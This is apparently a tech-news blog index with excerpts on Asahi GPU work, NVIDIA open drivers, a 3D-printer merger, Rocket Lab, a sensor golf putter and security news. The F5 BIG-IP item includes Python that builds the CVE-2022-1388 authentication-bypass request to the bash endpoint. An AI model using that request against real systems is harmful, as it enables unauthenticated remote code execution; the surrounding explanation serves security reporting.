Asahi GPU Hacking

[Alyssa Rosenzweig] has been tirelessly working on reverse engineering the GPU built into Apple’s M1 architecture as part of the Asahi Linux effort. If you’re not familiar, that’s the project adding support to the Linux kernel and userspace for the Apple M1 line of products. She has made great progress, and even got primitive rendering working with her own open-source code just over a year ago.

Trying to mature the driver, however, has hit a snag. For complex rendering, something in the GPU breaks, and the frame is simply missing chunks of content. Some clever testing discovered the exact failure trigger — too much total vertex data. Put simply, it’s “the number of vertices (geometry complexity) times amount of data per vertex (‘shading’ complexity).” That… almost sounds like a buffer filling up, but on the GPU itself. This isn’t a buffer that the driver directly interacts with, so all of this sleuthing has to be done blindly. The Apple driver doesn’t have corrupted renders like this, so what’s going on?
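If the buffer-overflow theory holds, the failure condition is easy to model. Here’s a toy sketch of the idea in Python, with a made-up buffer size and function name that are purely illustrative; nothing below comes from the actual M1 hardware.

```python
# Toy model of the suspected failure mode: corruption appears once the
# total vertex data (count x bytes per vertex) overflows some fixed
# on-GPU buffer. The 64 KiB threshold here is invented for illustration.

BUFFER_BYTES = 64 * 1024  # hypothetical fixed buffer size

def render_would_corrupt(vertex_count: int, bytes_per_vertex: int) -> bool:
    """Predict corruption when total vertex data exceeds the buffer."""
    return vertex_count * bytes_per_vertex > BUFFER_BYTES

# A simple mesh with small vertices fits...
print(render_would_corrupt(1000, 16))
# ...but either more geometry or fatter vertices tips it over.
print(render_would_corrupt(100000, 16))
print(render_would_corrupt(1000, 128))
```

Note that either factor alone can trigger the overflow, which matches the observed “geometry complexity times shading complexity” trigger.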
Continue reading “Asahi GPU Hacking”

NVIDIA Releases Drivers With Openness Flavor

This year, we’ve already seen sizeable leaks of NVIDIA source code, and a release of open-source drivers for NVIDIA Tegra. It seems NVIDIA decided to amp it up, and just released open-source GPU kernel modules for Linux. The GitHub link named open-gpu-kernel-modules has people rejoicing, and we are already testing the code out, making memes and speculating about the future. NVIDIA currently describes this driver as experimental, calling it “production-ready” only for datacenter cards – but you can already try it out!

The Driver’s Present State

Of course, there’s nuance. This is new code, unrelated to the well-known proprietary driver. It will only work on cards from the RTX 2000 and Quadro RTX series onward (aka Turing and newer). The good news is that performance is comparable to the closed-source driver, even at this point! A peculiarity of this project – a good portion of the features that AMD and Intel drivers implement in the Linux kernel are, instead, provided by a binary blob running inside the GPU. This blob runs on the GSP, a RISC-V core only present on Turing GPUs and newer – hence the series limitation. Now, every GPU loads a piece of firmware, but this one’s hefty!

Caveats aside, this driver already provides more coherent integration into the Linux kernel, with massive benefits that will only increase going forward. Not everything’s open yet – NVIDIA’s userspace libraries and OpenGL, Vulkan, OpenCL and CUDA drivers remain closed, for now. Same goes for the old NVIDIA proprietary driver, which, I’d guess, will be left to rot – fitting, as “leaving to rot” is what that driver has previously done to generations of old but perfectly usable cards. Continue reading “NVIDIA Releases Drivers With Openness Flavor”

This Week In Security: F5 Twitter PoC, Certifried, And Cloudflare Pages Pwned

F5’s BIG-IP platform has a Remote Code Execution (RCE) vulnerability: CVE-2022-1388. This one is interesting, because a Proof of Concept (PoC) was quickly reverse engineered from the patch and released on Twitter, among other places.

HORIZON3.ai researcher [James Horseman] wrote an explainer that sums up the issue nicely. User authentication is handled by multiple layers: one is a Pluggable Authentication Modules (PAM) module, and another is implemented internally in a Java class. In practice, this means that if the PAM module sees an X-F5-Auth-Token header, it passes the request on to the Java code, which then validates the token to confirm it as authentic. If a request arrives at the Java service without this header, and instead the X-Forwarded-Host header is set to localhost, the request is accepted without authentication. The F5 authentication scheme isn’t naive: a request without the X-F5-Auth-Token header gets checked by PAM, and dropped if the authentication doesn’t check out.

So where is the wiggle room that allows for a bypass? Yet another HTTP header, the Connection header. Normally this one only comes in two varieties, Connection: close and Connection: keep-alive. Really, this header is a hint describing the connection between the client and the edge proxy, and its contents are a list of other headers to be removed by a proxy. It’s essentially the list of headers that only apply to the connection over the internet. Continue reading “This Week In Security: F5 Twitter PoC, Certifried, And Cloudflare Pages Pwned”
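For flavor, here’s a rough sketch of what the published proof-of-concept requests look like, assembled as a plain string and never sent anywhere. The header combination follows the write-up above, and the endpoint path is the one seen in public PoCs; treat the details as approximate illustration rather than a working exploit.

```python
# Sketch of the header trick behind the CVE-2022-1388 PoC. Nothing is
# transmitted; we just assemble a raw HTTP/1.1 request to show the shape
# of the bypass. Details are approximate, per public PoCs.

def build_bypass_request(host: str) -> str:
    headers = {
        "Host": host,
        # Present, so the front-end PAM layer waves the request through...
        "X-F5-Auth-Token": "anything",
        # ...but listed in Connection, so it gets stripped as a
        # hop-by-hop header before the Java backend ever sees it.
        "Connection": "keep-alive, X-F5-Auth-Token",
        # With no token in sight, the backend trusts "local" requests.
        "X-Forwarded-Host": "localhost",
    }
    lines = ["POST /mgmt/tm/util/bash HTTP/1.1"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n"

print(build_bypass_request("victim.example"))
```

The Connection header doing double duty as a “strip these headers” directive is the whole trick: the token satisfies the front layer, then vanishes before the back layer can reject it.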

MakerBot And Ultimaker To Merge, Focus On Industry

Nine years ago, MakerBot was acquired by Stratasys in a deal worth slightly north of $600 million. At the time it was assumed that MakerBot’s line of relatively affordable desktop 3D printers would help Stratasys expand its reach into the hobbyist market, but in the end, the company all but disappeared from the hacker and maker scene. Not that many around these parts were sad to see them go — by abandoning the open source principles the company had been built on, MakerBot had already fallen out of the community’s favor by the time the buyout went through.

So today’s announcement that MakerBot and Ultimaker have agreed to merge into a new 3D printing company is a bit surprising, if for no other reason than that MakerBot seemed to have transitioned into a so-called “zombie brand” some time ago. In a press conference this afternoon it was explained that the new company would actually be spun out of Stratasys, and though the American-Israeli manufacturer would still own a sizable chunk of the as-yet-unnamed company, it would operate as its own independent entity.

MakerBot has been courting pro users for years.

In the press conference, MakerBot CEO Nadav Goshen and Ultimaker CEO Jürgen von Hollen explained that the plan was to maintain the companies’ respective product lines, but at the same time expand into what they referred to as an untapped “light industrial” market. By combining the technology and experience of the two companies, the merged entity would be uniquely positioned to deliver the high level of reliability and performance that customers would demand at what they estimated to be a $10,000 to $20,000 USD price point.

When MakerBot announced their new Method 3D printer would cost $6,500 back in 2018, it seemed clear they had their eyes on a different class of clientele. But now that the merged company is going to put their development efforts into machines with five-figure price tags, there’s no denying that the home-gamer market is officially in their rear-view mirror. That said, absolutely zero information was provided about the technology that would actually go into said printers, although given their combined commercial experience, it seems all but certain that these future machines will use some form of fused deposition modeling (FDM).

Now we’d hate to paint with too broad a brush, but we’re going to assume that the average Hackaday reader isn’t in the market for a 3D printer that costs as much as a decent used car. But there’s an excellent chance you’re interested in at least two properties that will fall under the umbrella of this new printing conglomerate: MakerBot’s Thingiverse, and Ultimaker’s Cura slicer. In the press conference it was made clear that everyone involved recognized both projects as vital outreach tools, and that part of the $62.4 million cash investment the new company is set to receive has been set aside specifically for their continued development and improvement.

We won’t beat around the bush — Thingiverse has been an embarrassment for years, even before they leaked the account information of a quarter million users because of their antiquated back-end. A modern 3D model repository run by a company the community doesn’t openly dislike has been on many a hacker’s wish list for some time now, but we’re not against seeing the existing service get turned around by a sudden influx of cash, either. We’d be happy to see more funding go Cura’s way as well, so long as it’s not saddled with the kind of aggressive management that’s been giving Audacity users a headache. Here’s hoping the new company, whatever it ends up being called, doesn’t forget about the promises they’re making to the community — because we certainly won’t.

With Rocket Lab’s Daring Midair Catch, Reusable Rockets Go Mainstream

We’ve all marveled at the videos of SpaceX rockets returning to their point of origin and landing on their spindly deployable legs, looking for all the world like something pulled from a 1950s science fiction film. On countless occasions founder Elon Musk and president Gwynne Shotwell have extolled the virtues of reusable rockets, such as lower operating cost and the higher reliability that comes with each booster having a flight heritage. At this point, even NASA feels confident enough to fly their missions and astronauts on reused SpaceX hardware.

Even so, SpaceX’s reusability program has remained an outlier, as all other launch providers have stayed the course and continue to offer only expendable booster rockets. Competitors such as United Launch Alliance and Blue Origin have teased varying degrees of reusability for their future vehicles, but to date have nothing to show for it beyond some flashy computer-generated imagery. All the while SpaceX continues to streamline their process, reducing turnaround time and refurbishment costs with each successful reuse of a Falcon 9 booster.

But that changed earlier this month, when a helicopter successfully caught one of Rocket Lab’s Electron boosters in midair as it fell back down to Earth under a parachute. While calling the two companies outright competitors might be a stretch given the relative sizes and capabilities of their boosters, SpaceX finally has a sparring partner when it comes to the science of reusability. The Falcon 9 has already smashed the Space Shuttle’s record turnaround time, but perhaps Rocket Lab will be the first to achieve Elon Musk’s stated goal of re-flying a rocket within 24 hours of its recovery.

Continue reading “With Rocket Lab’s Daring Midair Catch, Reusable Rockets Go Mainstream”

A putter with an Arduino attached to its shaft

This Golf Club Uses Machine Learning To Perfect Your Swing

Golf can be a frustrating game to learn: it takes countless hours of practice to get anywhere near the perfect swing. While some might be lucky enough to have a pro handy every time they’re on the driving range or putting green, most of us will have to get by with watching the ball’s motion and using that to figure out what we’re doing wrong.

Luckily, technology is here to help: [Nick Bild]’s Golf Ace is a putter that uses machine learning to analyze your swing. An accelerometer mounted on the shaft senses the exact motion of the club and uses a machine learning algorithm to see how closely it matches a professional’s swing. An LED mounted on the club’s head turns green if your stroke was good, and red if it wasn’t. All of this is driven by an Arduino Nano 33 IoT and powered by a lithium-ion battery.
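To make the idea concrete, here’s a radically simplified model of what the club is doing. The real Golf Ace runs a trained machine learning model on the Arduino; the reference trace, threshold, and simple distance comparison below are stand-ins for illustration only.

```python
# Radically simplified sketch of the Golf Ace concept: compare a recorded
# accelerometer trace against a reference "pro" stroke, and light the LED
# green if they're close enough. The reference values and threshold are
# made up; the real project uses a trained ML model instead.

import math

PRO_STROKE = [0.0, 0.2, 0.6, 1.0, 0.6, 0.2, 0.0]  # invented reference trace

def stroke_distance(trace, reference):
    """Euclidean distance between two equal-length accelerometer traces."""
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(trace, reference)))

def led_color(trace, threshold=0.3):
    """Green for a stroke close to the reference, red otherwise."""
    return "green" if stroke_distance(trace, PRO_STROKE) < threshold else "red"

print(led_color([0.0, 0.25, 0.55, 1.0, 0.65, 0.2, 0.0]))  # near the pro form
print(led_color([0.0, 0.9, 0.1, 0.8, 0.2, 0.9, 0.0]))     # a wild stab
```

A trained model earns its keep over a naive comparison like this by tolerating variations in timing and grip that a raw distance check would flag as errors.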

The Golf Ace doesn’t tell you what part of your swing to improve, so you’d still need some external instruction to help you get closer to the ideal form; [Nick]’s suggestion is to bundle an instructor’s swing data with a book or video that explains the important points. That certainly looks like a reasonable approach to us, and we can also imagine a similar setup to be used on woods and irons, although that would require a more robust mounting system.

In any case, the Golf Ace could very well be a useful addition to the many gadgets that try to improve your game. But in case you still end up frustrated, you might want to try this automated robotic golf club.

Continue reading “This Golf Club Uses Machine Learning To Perfect Your Swing”

This Week In Security: UClibc And DNS Poisoning, Encryption Is Hard, And The Goat

DNS spoofing/poisoning is the attack discovered by [Dan Kaminski] back in 2008 that simply refuses to go away. This week a vulnerability was announced in the uClibc and uClibc-ng standard libraries, making a DNS poisoning attack practical once again.

So for a quick refresher, DNS lookups generally happen over unencrypted UDP, and UDP is a stateless protocol, making it easier to spoof. DNS originally relied on just a 16-bit transaction ID (TXID) to validate DNS responses, but [Kaminski] realized that wasn’t sufficient when combined with a technique that generated massive amounts of DNS traffic. That attack could poison the DNS records cached by public DNS servers, greatly amplifying the effect. The solution was to randomize the UDP source port used when sending DNS requests, making it much harder to “win the lottery” with a spoofed packet, because both the TXID and source port would have to match for the spoof to work.
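Some quick back-of-the-envelope math shows why the port randomization helps so much. The size of the usable ephemeral port pool varies by operating system, so the figure below is an assumption for illustration.

```python
# Back-of-envelope odds of a single spoofed DNS response being accepted,
# assuming the attacker must guess uniformly random values. The ~64,000
# usable ephemeral source ports is an assumed, OS-dependent figure.

TXID_SPACE = 2 ** 16    # 16-bit transaction ID
PORT_SPACE = 64_000     # roughly, usable ephemeral source ports

odds_txid_only = 1 / TXID_SPACE
odds_txid_and_port = 1 / (TXID_SPACE * PORT_SPACE)

print(f"TXID alone:      1 in {TXID_SPACE:,}")
print(f"TXID + src port: 1 in {TXID_SPACE * PORT_SPACE:,}")
```

Going from one-in-tens-of-thousands to one-in-billions per packet is the difference between an attack that succeeds in seconds of flooding and one that doesn’t.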

uClibc and uClibc-ng are miniature implementations of the C standard library, intended for embedded systems. One of the things this standard library provides is a DNS lookup function, and this function has some odd behavior. When generating DNS requests, the TXID is incremental — it’s predictable and not randomized. Additionally, the TXID will periodically reset back to its initial value, so not even the entire 16-bit key space is exercised. Not great. Continue reading “This Week In Security: UClibc And DNS Poisoning, Encryption Is Hard, And The Goat”
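To see why that’s a problem, here’s a toy model of the behavior described above. The class name, reset value, and wrap-around point are all illustrative rather than lifted from the uClibc source.

```python
# Toy model of the flawed TXID generation: each lookup's ID is just the
# previous one plus one, wrapping back to a fixed start value instead of
# spanning the full 16-bit space. Values here are invented for illustration.

RESET_VALUE = 1

class PredictableTxid:
    def __init__(self):
        self.txid = RESET_VALUE

    def next_id(self) -> int:
        current = self.txid
        self.txid += 1
        if self.txid > 0x7FFF:      # periodic reset: upper half never used
            self.txid = RESET_VALUE
        return current

gen = PredictableTxid()
ids = [gen.next_id() for _ in range(5)]
print(ids)  # an observer who sees one TXID can predict all the rest
```

With the TXID predictable, an attacker only has to beat the source port, and if that’s fixed or guessable too, spoofed responses become practical again, fourteen years after [Kaminski]’s fix.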